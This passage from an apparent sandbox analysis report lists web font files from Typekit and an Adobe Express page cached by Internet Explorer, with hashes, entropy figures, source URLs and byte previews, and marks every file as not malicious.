                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://use.typekit.net/af/8f4e31/0000000000000000000132e3/27/d?primer=7a5a436c948772f5260024dfadc8f7cd849e1448f8bf41ba74a247e8e46f3aee&fvd=n7&v=3
                                                                                                                                                                                                                                                        Preview: wOFF......b................................DYNA...X.........$..GDYN............h;.GPOS..........I.m2EBOS/2.......[...`}7P.VDMX............l.tPcmap..a.........!.`pcvt ...H... ... ...Kfpgm...h.......s.Y.7gasp...l............glyf..'D..5o..d.lN..head...t...4...6.RI.hhea...........$....hmtx..\....!...8....loca..^..........k..maxp...8... ... ...cname............~p.[post..`x........F..Jprep...d...U...z...%x...S.X..D.s.X...Vc....jl5....m.m{:...3.....#..C.P..WB..!..K8}...'.>...6".l$"....b....F4}$*.m4b...ic...$....866q..8.q.o.@o.OB..DzCB..D$..I..$!.MJr.;).d...I... .MI....zAj..4..s...#.MO&=#..mF..)..j3..f!.....6.9....c.... .....6..ln..!y(`.RP..G!....Et.....(f.S\.(B.[...K1J...RFw(AY[.r.M)...T.e..[...-Ge.<Ul...T..*Q.V...BM].*.l5j...ckP.......m-....ih......S.&.>Mu..4..in..B.iLK.V.).u.f...i...mI{..:..t......mK...:C{...t.i:..v...L/....mW..n..I......N.....mo..8.0..a.......l...(..a.2..b..0..v.ct......g.3^....;..:.(&..L.c.....T;.i..8B.x.....>&2.Nb...l.e.s.T.j..oCX`..P...";...
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\d[10]
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:Web Open Font Format, CFF, length 66740, version 0.0
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):66740
                                                                                                                                                                                                                                                        Entropy (8bit):7.99411972026963
                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                        SSDEEP:1536:J4lzR3d/ZD6MCYkk+e5Hj9EgKWB/uS7wcA+vVWB:ql9NZ/CYFjjKgKU/uLzh
                                                                                                                                                                                                                                                        MD5:02BDAC466185E4E1161BBFAB2C066327
                                                                                                                                                                                                                                                        SHA1:5C0C5E8BDB41694C8AD5605D5C1FFF7EB0702EBA
                                                                                                                                                                                                                                                        SHA-256:AC44BE8F65384DEF37D9091D668E54A4B79AB6A3156C5D8CFBD3268BEC558971
                                                                                                                                                                                                                                                        SHA-512:01C761222E6DB3A3F81DAD88191BAA8A020536C4F8EF8692796B94C68AB1FDD4EF672D8DB24336E12BA32F0F96079E9D388EFD93433E9FF62BB8976596F65CD9
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://use.typekit.net/af/cb695f/000000000000000000017701/27/d?primer=7cdcb44be4a7db8877ffa5c0007b8dd865b3bbc383831fe2ea177f62257a9191&fvd=n4&v=3
                                                                                                                                                                                                                                                        Preview: wOFFOTTO....................................BASE...X...F...Fe$].CFF ...H...a.....w..DYNA............$G9GDYN......-...a./..GPOS......#...T<"9.`GSUB.............0.OS/2.......Y...`\Wv.cmap...`...S.....lgasp................head.......4...6..%uhhea.......!...$....hmtx...h.......x7wW.maxp...@.........^P.name................post...L....... ...2..............ideoromn..DFLT..cyrl..grek..latn...................\..............x.c`d```5.z...1...+.3........p..?.?/K... ....$...A.!x.RKn.0..9N...Qt.5.v..R 8.Wv..Y%...%..........0...]t.S...@G...M..!q.{3C.Q....<t.o.=.a...^a...>...>9....a.........J.....O.=..b.{.x{......p.......~8|......$.....:..U.h.84F...e].ul.J.I...f..F.u......2.q1..,.#...xr5..m..N]......N..,D..].P*..ii.e...Trx6.....6I(#...z..S]..9Tz.1rY.f....'..U.G..P..D..P".&^....8.,x].....7.....e..sl.F.Jc#.Y..s...Th............aL.....E...t..(;..U...;....,......^H...LJ..g.x.A^[....X.._.g6.kb..}G..%.n.e......}.X....]?g^;~C.^4..t...<...x.c`f|.8.......).....B3.1.1*.E.Y..XX..X.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\d[1]
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:Web Open Font Format, CFF, length 36068, version 0.0
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):36068
                                                                                                                                                                                                                                                        Entropy (8bit):7.989619253709987
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:IyDwGKhjOoERY0ubYt8VzsS62LZB+iADpLaBAWrO5wL0q6qMxIkk:IycpjAUY6VKKTPADpkdrPBZlkk
                                                                                                                                                                                                                                                        MD5:35870FDA65BBD420FEDAC45D4CB0F5C9
                                                                                                                                                                                                                                                        SHA1:A9F5393402174551A2FF00C9C20739B82E138C53
                                                                                                                                                                                                                                                        SHA-256:8792852FC7DE9DE854131ACAD09CB7867193BF1F175E83D7EE55CF0CE9E35EC2
                                                                                                                                                                                                                                                        SHA-512:853C6F0F7605214784A792F9E192279A68F4846C9CFE7DCC6C5599EF74077E9E5CF0413DC93284155D20537F0DE9C27AFB1312CCBF8FCE2D0DCBD2B1562421E4
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://use.typekit.net/af/949f99/00000000000000003b9b3068/27/d?primer=7cdcb44be4a7db8877ffa5c0007b8dd865b3bbc383831fe2ea177f62257a9191&fvd=n7&v=3
                                                                                                                                                                                                                                                        Preview: wOFFOTTO....................................BASE...X...F...Fe!].CFF ...@..a...{..E^.DYNA..f.........z...GDEF..g....r........GDYN..g....6...q.j=.GPOS..h....I..+.Q..GSUB..{.......!.f...OS/2.......W...`.f..cmap...(.......>..head.......6...6...thhea.......!...$....hmtx............iT3.maxp...8..........P.name............fS..post........... ...X..............ideoromn..DFLT..cyrl..grek..latn...................Y...............v._.<..........X.......X.........7............x...j.@....'.PB..nf.@2..Xv.BI..*.`.tU${.............>L_.G.8.......3Gw...5..Cw.yw...W.....=....}j...x....=.8>.......O...x.......x...u...}l.... z...".}...m.>..8Z......<-tity".A0..2.E+1.RFU.Z.Y.7i..[].W:_.2.L.En....i.......|6.A..J..k1....(...2O.....l<.=.]Y...}.].,.r.._=..gW..'a.M.!4..B...`!p...9. f<#.-.,a...cC..#H.%r...b..8.|....56.[L.-W5.sNEHM.O<.........{N.....].n.xS.x.>.D{...J..7...A...u...j5...tN...v!....1...6.....|....Qo...`\....m...!.8...#L~.....x.c`frb.................."......l. .E....(..
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\d[2]
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:Web Open Font Format, TrueType, length 21964, version 0.0
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):21964
                                                                                                                                                                                                                                                        Entropy (8bit):7.9725559995125685
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:ANBtlENfUp59YhNFBz4TpgYHLgvE/vvkacO8syS9taWGsSwBytxwhuAd/tDW:sN8Up8hNf4lJHLgvE/0Pbsr9tXSOytxv
                                                                                                                                                                                                                                                        MD5:25704A0DEF6040D9ED167F36D3F28242
                                                                                                                                                                                                                                                        SHA1:FBB0D647FC706FC8867EF28DE3A03BD42FA7BDF0
                                                                                                                                                                                                                                                        SHA-256:246BA9C4AB21AC5BB04019666F63AA321BD893478FC4DFF77B25C86FBB5BF36F
                                                                                                                                                                                                                                                        SHA-512:39F31749C8008B106539FB4C249280E25A8FFD9771AB8FF3C45FDF5663C7F8BFDB8CF58766AB12263DE1C7F59DCA51B1691299390975C70556E46EA289868F2D
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://use.typekit.net/af/74fc30/0000000000000000000158d4/26/d?subset_id=2&fvd=i1&v=3
                                                                                                                                                                                                                                                        Preview: wOFF......U.................................DYNA..............t.FFTM............]..<GDEF...D...8...B...<GDYN...|.........j..GPOS...`...K.....L..OS/2.......Y...`~wz+cmap..U4........+..wcvt .......$...$....fpgm...........e#./.gasp................glyf......Dy..v8.3.head.......4...6.i;.hhea...H... ...$.k.4hmtx..Q(...?...lJVC.loca..Sh.........:-Tmaxp...h... ... ....name...........~v..?post..U ....... ...(prep.......R...R].oc.........o1.......T......x........6.<.D.D.@.>.:.1.5.8.3.,.F.B..x.]Q.N[A.......c..hS.fB...$.W...vc9B.\.b\..P Q..k.h().A..R>.O@bfM.(....s..r..]Z.y..R......v...t}...v.@..^.n...`3.rG....-.!.i'P....6...>.d..AK3MO....B`...0....../X....C.i*..s*..Ks....k..vp&"?..hj..@._:.z>.b.r.0...S.d".f2].T-3.up...;X.Js....U.......-.2KC...*1B.$.BN9w.?)P>..1....a..q.50.....fS.{.0~.G..o..>..6F..X.`...QU...s/.....3.%`y.._'..;6..em.C.....2....U.......tJ......p.X...R.v....`H.F..h-;.*...d/.*..........x.c`d```b8Z.2.c<..W.y..@..S.*....v.88.....q.1.......x..AN.@....@..
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\d[3]
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:Web Open Font Format, TrueType, length 20540, version 0.0
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):20540
                                                                                                                                                                                                                                                        Entropy (8bit):7.970560806372044
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:Fo1SMQ+uypEPZJnq9tVxtO0TKJOOr4ohDCR/Iowk+hkFo31JAM7/Se:FoQ9+u7nSBM0+4ohDiQhkS3cMDSe
                                                                                                                                                                                                                                                        MD5:F7DFBBC4491156A7123A80DD7F9A1AA7
                                                                                                                                                                                                                                                        SHA1:643F976CF7504CBF212657C25BE954A73F7F3F04
                                                                                                                                                                                                                                                        SHA-256:6778F1BCD6798ADE72372490A2BC16AD9BE3A23996E86878AF0C8F429B429CB9
                                                                                                                                                                                                                                                        SHA-512:D9689A58CA5C421105B1846BD35C51C0AAA7B3D928F2EE04BF00D3679FFCE90FBA5C12829626F090CED0ECDE1158D5A7068AB7EC401B2ACDC25DB4324940F804
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://use.typekit.net/af/3d913c/000000000000000000017709/26/d?subset_id=2&fvd=n6&v=3
                                                                                                                                                                                                                                                        Preview: wOFF......P<................................DYNA............4.(.FFTM............]...GDEF...d...8...B...<GDYN................GPOS...|...x...@.z..OS/2.......Y...`..zpcmap..O.........+..wcvt .......0...0...Jfpgm...........e#./.gasp................glyf......>...b...`.head.......5...6..;.hhea...l... ...$...*hmtx..K....-...lx.8.loca..M..........U.Rmaxp....... ... ...Tname...........u....post..O........ ...(prep.......s....^`...........o1.......2......x........6...|.....n.....................u........x.]Q.N[A.......c..hS.fB...$.W...vc9B.\.b\..P Q..k.h().A..R>.O@bfM.(....s..r..]Z.y..R......v...t}...v.@..^.n...`3.rG....-.!.i'P....6...>.d..AK3MO....B`...0....../X....C.i*..s*..Ks....k..vp&"?..hj..@._:.z>.b.r.0...S.d".f2].T-3.up...;X.Js....U.......-.2KC...*1B.$.BN9w.?)P>..1....a..q.50.....fS.{.0~.G..o..>..6F..X.`...QU...s/.....3.%`y.._'..;6..em.C.....2....U.......tJ......p.X...R.v....`H.F..h-;.*...d/.*..........x.c`d```b8z.;.h<..W.y..@..S.*V...+...........T..........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\d[4]
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:Web Open Font Format, TrueType, length 19972, version 0.0
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):19972
                                                                                                                                                                                                                                                        Entropy (8bit):7.973644639018193
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:Cf5Fav9bGgUEYSX1onww9sud9sYpihw+yncXRmtwE1YHoVEY:CDajJOnqucYMhW+mtMoVEY
                                                                                                                                                                                                                                                        MD5:8A4B72CBF267D80FA1AA077748D6F386
                                                                                                                                                                                                                                                        SHA1:BFCBD9749829EC32F8E92EDB67B2103A2B693FCB
                                                                                                                                                                                                                                                        SHA-256:25847A66D07866EDDEA20934F252A9D9FBA7CE24FA9EB0A60FA3F3056182B93A
                                                                                                                                                                                                                                                        SHA-512:3672D408F2B48E5986B43C90B9140325DBF9EE74A12A6E08FB893964A7E49505D5B36D87F5DDE9185C0819F913321E38EF30A9BA43745B21E35C3DDA56181913
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://use.typekit.net/af/e030d3/0000000000000000000158d3/26/d?subset_id=2&fvd=n1&v=3
                                                                                                                                                                                                                                                        Preview: wOFF......N........\........................DYNA...`........4.(.FFTM............]..,GDEF.......8...B...<GDYN...P............GPOS...0.........f.'OS/2.......W...`~wz#cmap..Ml........+..wcvt .............R..fpgm...........e#./.gasp................glyf...$..=b..b00...head.......4...6..<.hhea... ... ...$....hmtx..I........lGZO.loca..K..........Y.Vmaxp...@... ... ....name...........H?..post..MX....... ...(prep...x...O...O...4.........o1.......H......x........6.<.<.B.:.>.5.@..x.]Q.N[A.......c..hS.fB...$.W...vc9B.\.b\..P Q..k.h().A..R>.O@bfM.(....s..r..]Z.y..R......v...t}...v.@..^.n...`3.rG....-.!.i'P....6...>.d..AK3MO....B`...0....../X....C.i*..s*..Ks....k..vp&"?..hj..@._:.z>.b.r.0...S.d".f2].T-3.up...;X.Js....U.......-.2KC...*1B.$.BN9w.?)P>..1....a..q.50.....fS.{.0~.G..o..>..6F..X.`...QU...s/.....3.%`y.._'..;6..em.C.....2....U.......tJ......p.X...R.v....`H.F..h-;.*...d/.*..........x.c`d```b8.....x~......."..~Ul...V........r.........x..AN.@......EQ..j....v.E..
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\d[5]
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:Web Open Font Format, TrueType, length 22376, version 0.0
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):22376
                                                                                                                                                                                                                                                        Entropy (8bit):7.9745730846169725
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:nAizO59XJQcmATaTY6S0r89SmOrPuaDuXo0J22vNYckNcL5VjWV3ncNHFb:1AQcmATaTYn0g9Wiaso0wqKNM5pmcfb
                                                                                                                                                                                                                                                        MD5:74B4BA34F532FC0C6C7C557A65B733B6
                                                                                                                                                                                                                                                        SHA1:CA3CF7110DF3502935D79F055BFFE00A55087C3A
                                                                                                                                                                                                                                                        SHA-256:58C894C70D7848BD09B94AF1754E5532DCAC4189ED48F9AA3AB5E1ACEF4376C1
                                                                                                                                                                                                                                                        SHA-512:29A5BA44B73F6AD9F3AFA09ACA3326E1BD8FD0C79C681D91A03E12B46D09A198E2CD5A1B6AFAE7F59F2E4DFC4AC64480F0F96E22FE8879C22C3A8F52A2B98B5B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://use.typekit.net/af/6c57c4/0000000000000000000158d6/26/d?subset_id=2&fvd=i6&v=3
                                                                                                                                                                                                                                                        Preview: wOFF......Wh.......|........................DYNA..............t.FFTM............]...GDEF.......8...B...<GDYN.............j..GPOS...........J.w..OS/2...T...Y...`..zvcmap..V.........+..wcvt .......^...^.C..fpgm...$.......e#./.gasp................glyf......E...s..r.Ahead.......5...6.V;.hhea....... ...$.W.phmtx..R....N...l{k,Lloca..U.............maxp....... ... ....name............#.g?post..V........ ...(prep.......t....i.D..........o1.......=......x........6...|.........................................@.k...........u.e.....R.7.9.;.F............x.]Q.N[A.......c..hS.fB...$.W...vc9B.\.b\..P Q..k.h().A..R>.O@bfM.(....s..r..]Z.y..R......v...t}...v.@..^.n...`3.rG....-.!.i'P....6...>.d..AK3MO....B`...0....../X....C.i*..s*..Ks....k..vp&"?..hj..@._:.z>.b.r.0...S.d".f2].T-3.up...;X.Js....U.......-.2KC...*1B.$.BN9w.?)P>..1....a..q.50.....fS.{.0~.G..o..>..6F..X.`...QU...s/.....3.%`y.._'..;6..em.C.....2....U.......tJ......p.X...R.v....`H.F..h-;.*...d/.*..........x.c`d```
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\d[6]
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:Web Open Font Format, TrueType, length 20720, version 0.0
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):20720
                                                                                                                                                                                                                                                        Entropy (8bit):7.971274872077512
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:ep0ld6FR9PFBI+qyX9W69gNqcJddRjJpyZc+2HC9j2SDGDYfLrDYSzJgIY:K0ld6VtBI+qy069gAa1Jx+G6zDGDYfH0
                                                                                                                                                                                                                                                        MD5:185A2AFC0935C94FBB5683112A905CE2
                                                                                                                                                                                                                                                        SHA1:4EB450182B9C658C6916CDDED80D3922E90DDCD8
                                                                                                                                                                                                                                                        SHA-256:F81CA8209A0526BEF58A70CF4288A1B1F8A02D8B1F7F8E3BC4B8A179323A1DFD
                                                                                                                                                                                                                                                        SHA-512:A8C1BCA226F757C2BC8A096E31D2E05B2F8C184A531D93CDE6A26974A10B96005F4F341D52A80404919CE050BE8F89EE91EFC7D996936B37879DFD85CAA36E9A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://use.typekit.net/af/9951d2/0000000000000000000158d7/26/d?subset_id=2&fvd=n4&v=3
                                                                                                                                                                                                                                                        Preview: wOFF......P........`........................DYNA............4.(.FFTM............]...GDEF...p...8...B...<GDYN................GPOS...........@.J.OS/2.......Y...`~.z~cmap..PX........+..wcvt .......2...2.A.0fpgm...........e#./.gasp................glyf...L..?...bT.@..head.......4...6.E;.hhea...x... ...$.I..hmtx..L`...,...le.BVloca..N.............maxp....... ... ....name...........iZ.[.post..PD....... ...(prep...............>.........o1..............x........6...`.n.|.....Z.................O...t.c......x.]Q.N[A.......c..hS.fB...$.W...vc9B.\.b\..P Q..k.h().A..R>.O@bfM.(....s..r..]Z.y..R......v...t}...v.@..^.n...`3.rG....-.!.i'P....6...>.d..AK3MO....B`...0....../X....C.i*..s*..Ks....k..vp&"?..hj..@._:.z>.b.r.0...S.d".f2].T-3.up...;X.Js....U.......-.2KC...*1B.$.BN9w.?)P>..1....a..q.50.....fS.{.0~.G..o..>..6F..X.`...QU...s/.....3.%`y.._'..;6..em.C.....2....U.......tJ......p.X...R.v....`H.F..h-;.*...d/.*..........x.c`d```b8Z.9.?...+.<....._.K`.....p......@.@......
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\d[7]
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:Web Open Font Format, TrueType, length 22492, version 0.0
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):22492
                                                                                                                                                                                                                                                        Entropy (8bit):7.974382432382698
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:yDLC8fp6SXkpD0a74PboHnd4VZK1Jnn3J0YjWkPpSjYmRja+eUZ5EJSyT7MYLQ:iW8h6rD0ak8nyZ2ysrpeYmRcdfE
                                                                                                                                                                                                                                                        MD5:A2CAF0BD8F7084A90E2053AD61157C78
                                                                                                                                                                                                                                                        SHA1:9E35E2810DCCB3C791CEB2818B16EFA9328C307E
                                                                                                                                                                                                                                                        SHA-256:6537EEA8561F3D0903E4CAABB123C0AF961A09218290C678285B7C27ED335E54
                                                                                                                                                                                                                                                        SHA-512:1FAE0E3EC674A092FAD4813182C77144F698AEA5715BD94540CF4AB8CF865165CD1BC57A56E56254B3F8C0E9F10227FCFCE33FA2020D616CB0D7ADA1CBBB89DC
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://use.typekit.net/af/fe9c8e/0000000000000000000158d8/26/d?subset_id=2&fvd=i4&v=3
                                                                                                                                                                                                                                                        Preview: wOFF......W........P........................DYNA..............t.FFTM............]...GDEF.......8...B...<GDYN.............j..GPOS.......-...J.E..OS/2...X...Y...`~.zEcmap..WD........+..wcvt .......\...\...Xfpgm... .......e#./.gasp................glyf......E1..s.C..head.......4...6.W;.hhea....... ...$.Y.4hmtx..S0...E...lg.5.loca..Ux...........maxp....... ... ....name................post..W0....... ...(prep...............:.........o1.......'......x........6...`.n.|.....x.....u.............q.......k.>.W.......~.^.N.s...H.7.9.;.c.J.L.F...P..x.]Q.N[A.......c..hS.fB...$.W...vc9B.\.b\..P Q..k.h().A..R>.O@bfM.(....s..r..]Z.y..R......v...t}...v.@..^.n...`3.rG....-.!.i'P....6...>.d..AK3MO....B`...0....../X....C.i*..s*..Ks....k..vp&"?..hj..@._:.z>.b.r.0...S.d".f2].T-3.up...;X.Js....U.......-.2KC...*1B.$.BN9w.?)P>..1....a..q.50.....fS.{.0~.G..o..>..6F..X.`...QU...s/.....3.%`y.._'..;6..em.C.....2....U.......tJ......p.X...R.v....`H.F..h-;.*...d/.*..........x.c`d```b8./
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\d[8]
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:Web Open Font Format, TrueType, length 20932, version 0.0
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):20932
                                                                                                                                                                                                                                                        Entropy (8bit):7.97207524312144
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:3wgN6IL9Cl+QE5TQoI23a0zC9/IY1eizt+wcCMPyv2GTPNo/B1:AgN62MlkrI23a0G+keiBL4jKoZ1
                                                                                                                                                                                                                                                        MD5:E0F2BB6FEFF9005FADFAA0DEAC9F17D3
                                                                                                                                                                                                                                                        SHA1:5BCF4E553881D43087F31A8B47172F1F695E461B
                                                                                                                                                                                                                                                        SHA-256:809F249AF3A361113340A14136F8464AB4A1A23E47B05F71375115E6C23FFC92
                                                                                                                                                                                                                                                        SHA-512:8426F3F16F8B9FABC3F47DD3984156C723387E0F1FC804B25FE427B9B120E78CB376185BE701555ACBC9E26D2A8611F598C9DCB393B0950369A653632901F9C4
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://use.typekit.net/af/edcf1e/0000000000000000000158d9/26/d?subset_id=2&fvd=n3&v=3
                                                                                                                                                                                                                                                        Preview: wOFF......Q.................................DYNA............4.(.FFTM............]...GDEF...H...8...B...<GDYN................GPOS...`.......@...YOS/2.......W...`~wz1cmap..Q,........+..wcvt .......*...*...6fpgm...........e#./.gasp................glyf...(..@...e.....head.......4...6..;.hhea...P... ...$....hmtx..M@.......lVRI.loca..O`...........maxp...p... ... ....name...........Q%.{.post..Q........ ...(prep.......i...v..ym.........o1..............x........6.h.R.\.^.h.r.Y.z.`.d.m.j.t.L.F.J.f..x.]Q.N[A.......c..hS.fB...$.W...vc9B.\.b\..P Q..k.h().A..R>.O@bfM.(....s..r..]Z.y..R......v...t}...v.@..^.n...`3.rG....-.!.i'P....6...>.d..AK3MO....B`...0....../X....C.i*..s*..Ks....k..vp&"?..hj..@._:.z>.b.r.0...S.d".f2].T-3.up...;X.Js....U.......-.2KC...*1B.$.BN9w.?)P>..1....a..q.50.....fS.{.0~.G..o..>..6F..X.`...QU...s/.....3.%`y.._'..;6..em.C.....2....U.......tJ......p.X...R.v....`H.F..h-;.*...d/.*..........x.c`d```b8Z...h<..W.y..@..S.*.........`..r9.j....l..x...J.@
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\d[9]
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:Web Open Font Format, TrueType, length 24436, version 0.0
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):24436
                                                                                                                                                                                                                                                        Entropy (8bit):7.978037120154255
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:b2q7Hwg9s0WrCWQYOL4VhwnhHa63bzKnWhF52DHilk+9y5yS6P8N:KqrsYL4vwh663fKW/50iZ9IyZPs
                                                                                                                                                                                                                                                        MD5:6D26AE32705F04BD2CCC4DC335F15809
                                                                                                                                                                                                                                                        SHA1:6F67C23951FB9426FA426436CCC1CE1E6FDDF220
                                                                                                                                                                                                                                                        SHA-256:6E52D4DF448460F8B6C6C8DC776745BE4C85A9D18981772A89C9876B4E19FB37
                                                                                                                                                                                                                                                        SHA-512:687973BC1D027B36AC99E2B7AA9928B35148E7AA742B13FCF2A20B0947B7ED27EA470E770856711C584221E88F3FBEA5AA3A93A58DC59DB7794320E9B11F019A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://use.typekit.net/af/9d1933/00000000000000000001705b/26/d?subset_id=2&fvd=i3&v=3
                                                                                                                                                                                                                                                        Preview: wOFF......_t................................BASE.......F...Fe!].DYNA...............bGDYN.......#...Q.4.xGPOS...........dG...OS/2...X...\...`.}..cmap..]........8..}.cvt .......R....6...fpgm...0.......p...Ygasp................glyf......BX..w....Mhead.......6...6....hhea......."...$....hmtx..WX...+...z....loca..Y...._.....4..maxp....... ... .B..name............yJ..post..[........Q..$uprep............R.>...............ideoromn..DFLT..cyrl..grek..latn...................Y......x.c` .X..>.>.l.......=.g...............0.FU.........I...,o......4.=H..1...BX8a..x.Viw.F..yI..,%.-ja..i.F&l...A.c ]......;...._.d.s.7~Z../$...p...w.....e.Z...../...&..<..M.Q|(;{!e....Q......DD"P...D...Y.d|.QF..WM.-=..[.A.U.~.:.;..f3th=.%U.U.H.=R.e..+I+....W.P.N"i....H..g..h5..(.l..(R$..A.y....................V.K..../y.w9?)..[.-9...#;8;]....V.7.d;.U.....[6;.......L/4#X*_!..O(..HV..S....l.D.z....O..8bJ\3F.twtB.u....=.....w.......Q.'.DJ..M.6..XI.Jj.+&Ny..._.v..3.8....C.VNTr<..i&S.vR.hJ.(%......
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\express[1].htm
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):5242
                                                                                                                                                                                                                                                        Entropy (8bit):5.314936144800714
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:qqSH1UjQH1UEZ+yUW3+yG9H1Uh+yqHVTZpY4WjIGTLzmYaq/XYXg0emXjXgReUru:qFSQIymyG9JyqJ1pU/XYXHXjXwreXBrt
                                                                                                                                                                                                                                                        MD5:277413D92033811929CD47E46EFD0DAC
                                                                                                                                                                                                                                                        SHA1:68C1667443FC81CD4E4090F06EA081AB0F924C96
                                                                                                                                                                                                                                                        SHA-256:43F75F4934953473B42D2C95824FA5C1800453143F1301BED0512BBDD1FC91E9
                                                                                                                                                                                                                                                        SHA-512:F6DF9D4E3B99282C26F701171F795271E6FD9C3133A9E4C9C0945F3092317D9F3057FB148C5C1B35EFC274560D4FA466AA671822BE967CAE7ED5E6ABE568FECA
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/?r=reader_page_logo
                                                                                                                                                                                                                                                        Preview: <!DOCTYPE html><html><head><title>Make Social Graphics, Short Videos, and Web Pages To Stand Out.In Minutes | Adobe Spark</title><link rel="canonical" href="https://www.adobe.com/express/"><meta name="x-source-hash" content="TQd2yn6COm8CsXKP"><meta name="description" content="Adobe Spark is an online and mobile design app. Easily create stunning social graphics, short videos, and web pages that make you stand out on social and beyond."><meta property="og:title" content="Make Social Graphics, Short Videos, and Web Pages To Stand Out.In Minutes | Adobe Spark"><meta property="og:description" content="Adobe Spark is an online and mobile design app. Easily create stunning social graphics, short videos, and web pages that make you stand out on social and beyond."><meta property="og:url" content="https://www.adobe.com/express/"><meta property="og:image" content="https://www.adobe.com/express/media_1414f90572f278eae7d49cf2222e9b7d0063180cd.png?width=1200&amp;format=pjpg&amp;optimize=medium
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\feds[1].js
